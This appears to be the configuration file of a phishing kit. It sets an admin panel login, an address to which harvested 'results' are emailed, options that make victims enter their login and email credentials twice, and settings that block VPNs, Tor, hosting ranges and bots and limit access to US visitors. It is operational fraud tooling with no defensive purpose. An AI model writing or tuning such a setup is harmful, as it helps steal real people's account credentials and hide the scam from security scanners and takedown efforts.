
; Admin Panel Login
; Options: credentials
;You can find your Admin Panel in /Happy
Username = "zae3m"
Password = "@zae3m_tut"

; Your email for results
; Options: email address

Email = "test@mail.com"

; Double login
; Options: on or off

LoginTwice = "on"

; Double email access
; Options: on or off

EmailTwice = "on"

; Whitelist your IPs
; Use a VPN / Proxy !
; Options: IP or off

MyIP = "off"

; Proxy, Hosting, Tor detection
; Options: on or off

VPN = "on"

; Proxy, Hosting, Tor detection
; Not 100% reliable though
; Options: on or off

HeuristicVPN = "on"

; Special "cloudflare" protection
; will block 99% of bots in theory
; Options: on or off

CFProtection = "on"

; Allow access to a specific country
; Options: country code or off

CountryLock = "US"
